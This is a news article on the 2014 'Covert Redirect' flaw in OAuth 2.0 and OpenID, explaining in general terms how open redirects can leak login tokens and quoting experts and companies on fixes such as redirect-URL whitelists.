A vulnerability discovered in OAuth 2.0 and OpenID – dubbed “Covert Redirect,” a play on Open Redirect – could enable attackers to, at the very least, steal credentials from users of some of the most visited websites, including Facebook and Google.
The Covert Redirect vulnerability, discovered and blogged on by Wang Jing, a PhD student in mathematics from Nanyang Technological University, comes right on the heels of the disclosure of the now infamous Heartbleed bug.
The general consensus, so far, is that Covert Redirect is not as bad, but still a threat. Understanding what makes it dangerous requires a basic understanding of Open Redirect, and how it can be exploited.
“If you have any website that shows in its URL the address a user is going to be redirected to, it opens the door for an attacker to place their own URL there and mislead the user into thinking they are at a trusted site,” Ori Eisen, chief innovation officer with security and fraud detection firm 41st Parameter, said.
Covert Redirect plays off the Open Redirect concept, Jeremy Gillula, a staff technologist with the Electronic Frontier Foundation, said.
“A user clicks a link, which takes them to a website of a third-party [that is] vulnerable to Open Redirect, which uses OAuth or OpenID to log users in,” Gillula said.
“The user's attempt to log in brings them to [Facebook, for example,] where their OpenID account or OAuth credentials are actually stored.”
After the user logs into the legitimate Facebook page, they are redirected back to the third-party website, Gillula said.
As part of the redirect, Facebook would send along a “token", essentially a secret number that the third-party will send to Facebook when accessing the account for regular operations, such as posting a message to the user's wall.
“When the user comes back to the third-party website, they hit the Open Redirect vulnerability, and then they get tossed, along with their token, to the malicious website, which grabs the token and does all sorts of malicious stuff with it in their account,” Gillula said.
Both Gillula and Eisen said that, in most cases, attackers using Covert Redirect are only likely to steal credentials; however, that account access is all an attacker needs to create some havoc, particularly when these are big name accounts, such as Facebook, Google, Microsoft and LinkedIn.
Although Wang in the blog post said Covert Redirect would not be possible if third-party applications adhered to a whitelist, he said challenges lay in the practicality of implementing such a scheme, particularly with determining who is responsible for fixing the vulnerability.
One fix suggested by Gillula involved using a small script to actually try and visit the URL to which users are being redirected.
“If that URL then attempts to immediately redirect the script again, then the script could prevent the first redirect in the first place,” Gillula said.
“While this has the added benefit of guaranteeing no Covert Redirects, it would probably slow down the user's experience a tiny bit – and additional measures would probably be necessary to make sure attackers can't use this script to perform a denial-of-service attack.”
A Microsoft spokesperson said the company is looking into vulnerabilities in OpenID and will take necessary actions to protect customers.
To avoid this problem on Facebook, a spokesperson referred users to documentation that advises developers to specify a whitelist of OAuth redirect URLs.